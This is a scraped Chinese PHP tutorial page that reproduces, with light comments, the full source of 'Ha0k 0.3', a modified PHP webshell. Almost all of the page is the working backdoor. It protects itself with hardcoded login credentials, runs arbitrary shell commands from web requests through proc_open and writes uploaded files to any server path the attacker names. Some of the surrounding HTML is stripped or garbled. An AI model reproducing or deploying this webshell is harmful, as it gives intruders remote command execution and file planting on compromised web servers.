Home >Backend Development >PHP Tutorial >Ha0k 0.3 PHP web Trojan modified version_PHP tutorial

Ha0k 0.3 PHP web Trojan modified version_PHP tutorial

WBOY
WBOYOriginal
2016-07-21 15:44:08858browse

Copy code The code is as follows:

//Multiple users can be set here
$passwd = array('ha0k' => 'ha0k',
'hackerdsb'=>' hackerdsb');
/* Set the alias of the command here*/
$aliases = array('ls' => 'ipconfig',
'll' => 'ls -lvhF') ;
if (!isset($_SERVER['PHP_AUTH_USER'])||!isset($_SERVER['PHP_AUTH_PW'])||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
$passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
header('WWW-Authenticate: Basic realm="by Ha0k"');
header('HTTP/1.0 401 Unauthorized');
$authenticated = false;
}
else {
$authenticated = true;
/* Start session */
session_start( );
/* Initialize session. */
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd '] = getcwd(); //Get the current directory
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if ( !empty($_REQUEST['command'])) {
if (get_magic_quotes_gpc()) { //0 means off, 1 means on, filter when on
/* We don't want to add the commands to the history in the
* escaped form, so we remove the backslashes now. */
$_REQUEST['command'] = stripslashes($_REQUEST['command']); //will use addslashes() The string processed by the function returns as it is
}
/* history */
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) != = false) //Find the value in the saved array
unset($_SESSION['history'][$i]); //Destroy
array_unshift($_SESSION['history'], $_REQUEST['command ']);//The array_unshift() function is to insert new elements into an array. And this new array will be added to the beginning of the original array. What the function ultimately returns is the array after inserting new elements.
/* 输出Ha0k# command */
$_SESSION['output'] .= 'Ha0k# ' . $_REQUEST['command'] . "n";
/* Initialize the current working directory. */
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd'] = dirname(__FILE__); //获取当前所在目录
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */
if ($regs[1][0] == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs[1];
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
/* Transform 'x/..' into '' */
while (preg_match('|/..(?!.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/..(?!.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
if (@chdir($new_dir)) { //改变当前目录
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dirn";
}
} else {
/* The command is not a 'cd' command, so we execute it after
* changing the directory and save the output. */
chdir($_SESSION['cwd']); //改变目录
/* 别名扩展 */
$length = strcspn($_REQUEST['command'], " t"); //查找t字符串,返回位置
$token = substr($_REQUEST['command'], 0, $length); //取字符串0-t
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
$p = proc_open($_REQUEST['command'], //执行脚本
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
/* 读出发送 */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]), //转换特殊字符为HTML字符编码
ENT_COMPAT, 'GB2312');
}
/* 读出 */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'GB2312');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);//关闭管道
}
}
/* 构建在JavaScript使用命令历史记录 */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';//将数组搞成字符串
}
}
header('Content-Type: text/html; charset=GB2312');
echo '' . "n";
?>
if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
//echo "上传文件成功: " . $HTTP_POST_FILES['userfile']['name'];
}
?>
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


Ha0k webshell






HA0K


WE JUST FOR JUSTICE,FIGHT FOR EVIAL


You failed to authenticate yourself to PhpShell. You can href="">reload to try again.


Try reading the INSTALL file if you're having
problems with installing PhpShell.




exit;
}
error_reporting (E_ALL);
if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 10;
?>

当前目录为: <?php echo $_SESSION['cwd'] ?>








onkeyup="key(event)" size="78" tabindex="1">





行数:





本地文件名:

远程文件名:





 Mcafee(麦咖啡杀毒软件) 防止网页被挂马的设置教程(最后不要在服务器端打开) 我们强烈推荐服务器安装mcafee 8.5i的版本

全世界最小的php网页木马一枚 附PHP木马的防范方法

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/320598.htmlTechArticle复制代码 代码如下: ?php //此处可设置多个用户 $passwd = array('ha0k' = 'ha0k', 'hackerdsb'='hackerdsb'); /* 此处设置命令的别名 */ $aliases = array('ls' = '...
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn